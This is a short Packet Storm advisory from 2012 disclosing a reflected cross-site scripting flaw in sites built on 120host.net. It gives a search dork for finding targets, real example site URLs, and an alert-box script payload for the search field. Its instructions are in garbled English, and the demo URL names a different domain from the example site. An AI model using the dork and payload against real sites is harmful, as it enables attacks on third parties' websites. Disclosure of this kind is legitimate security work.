Sites powered by code from 120host.net appear to suffer from a cross site scripting vulnerability. Note that this finding houses site-specific data.
d20c64908a88aaaf4b2c62d545a432348c90464c70dda946a4bcd87c144f5ca8
########################################################################################
# Exploit Title : Powered by 120host.net Cross Site Scripting #
# Author : ApoCaLypSee #
# Software Link : http://120host.net/ #
# Dork : Powered by 120host.net free blog community #
# Contact : apocalypsee[at]w[dot]cn #
# Tested On : Windows #
# Date:25.07.2012 (10:00) #
########################################################################################
^#^#^#^#^#^#^#^#^#^#^#^#^#^#^#^#^#^#^#^#^#^#^#^#^#^#^#^#^#^#^#^#^#^#^#^#^#^#^#^#^#^#^#^#^#^#
^ # #
# Exp.:http://procicobapro.120host.net/2007/08/28/gb-xoor-ru-book-php-id-405/ #
^ We see search button.Button in your scpirt alert code paste #
# exp.:"><script>alert("ApoCaLypSee")</script> #
# and will see that : #
^http://qgod.com/search.php?q=%22%3E%3Cscript%3Ealert%28%22ApoCaLySee%22%29%3C%2Fscript%3E #
^ #
# Greetz: http://darkdevilz.in #
^ #
^ #
###########################################################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed